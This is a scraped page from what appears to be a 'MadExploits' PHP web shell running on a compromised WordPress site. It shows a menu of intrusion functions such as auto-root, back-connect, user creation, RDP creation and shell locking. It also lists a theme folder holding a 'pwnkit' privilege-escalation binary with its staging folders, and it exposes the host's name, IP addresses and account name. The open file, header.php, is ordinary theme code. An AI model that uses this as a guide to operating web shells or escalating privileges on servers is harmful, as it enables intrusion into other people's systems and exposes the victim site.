Linux webm004.cluster106.gra.hosting.ovh.net 5.15.167-ovh-vps-grsec-zfs-classid #1 SMP Tue Sep 17 08:14:20 UTC 2024 x86_64
Apache
: 10.106.20.4 | : 216.73.216.216
Cant Read [ /etc/named.conf ]
7.4.33
alinaousgg
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
alinaousgg /
www /
wp-content /
themes /
imroz /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
assets
[ DIR ]
drwxr-xr-x
inc
[ DIR ]
drwxr-xr-x
languages
[ DIR ]
drwxr-xr-x
layouts
[ DIR ]
drwxr-xr-x
template-parts
[ DIR ]
drwxr-xr-x
woocommerce
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
404.php
1.49
KB
-rw-r--r--
archive-portfolio.php
1.23
KB
-rw-r--r--
archive.php
2.25
KB
-rw-r--r--
comments.php
4.94
KB
-rw-r--r--
footer.php
924
B
-rw-r--r--
functions.php
12.39
KB
-rw-r--r--
functions.php.backup-202511030...
10.67
KB
-rw-r--r--
header.php
1.99
KB
-rw-r--r--
index.php
2.51
KB
-rw-r--r--
page.php
855
B
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
screenshot.png
187.77
KB
-rw-r--r--
search.php
2.25
KB
-rw-r--r--
searchform.php
653
B
-rw-r--r--
sidebar.php
371
B
-rw-r--r--
single-portfolio.php
335
B
-rw-r--r--
single.php
365
B
-rw-r--r--
style-editor.css
41.47
KB
-rw-r--r--
style-rtl.css
11.49
KB
-rw-r--r--
style.css
1.54
KB
-rw-r--r--
wp-debug.log
102
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : header.php
<?php /** * The header for our theme * * This is the template that displays all of the <head> section and everything up until <div id="content"> * * @link https://developer.wordpress.org/themes/basics/template-files/#template-partials * * @package imroz */ ?> <!doctype html> <html <?php language_attributes(); ?>> <head> <meta charset="<?php bloginfo('charset'); ?>"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="profile" href="https://gmpg.org/xfn/11"> <?php $imroz_options = Helper::imroz_get_options(); ?> <meta name="theme-style-mode" content="<?php echo (int) ($imroz_options['active_dark_mode']); ?>"> <?php wp_head(); ?> <script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start': new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0], j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src= 'https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f); })(window,document,'script','dataLayer','GTM-WKCFS3N');</script> <script async src="https://www.googletagmanager.com/gtag/js?id=G-MTSEP4Y87K"></script> <script> window.dataLayer = window.dataLayer || []; function gtag(){dataLayer.push(arguments);} gtag('js', new Date()); gtag('config', 'G-MTSEP4Y87K'); </script> </head> <?php $menu_type = rbt_get_acf_data( 'imroz_menu_type'); $onepage_atts = ($menu_type == 'onepage') ? 'data-spy=scroll data-target=.navbar-onepage data-offset=70' : ''; ?> <body <?php body_class(); ?> <?php echo esc_attr($onepage_atts); ?>> <?php if ($imroz_options['imroz_preloader'] !== 'no'){ get_template_part('template-parts/header/preloader'); } if ( function_exists( 'wp_body_open' ) ) { wp_body_open(); } $page_skin = rbt_get_acf_data('imroz_select_page_skin'); $active_dark_screen = ($page_skin == 'dark') ? 'active-dark' : ''; ?><div class="main-page <?php echo esc_attr($active_dark_screen); ?>"><?php get_template_part('template-parts/header/header', 'main');
Close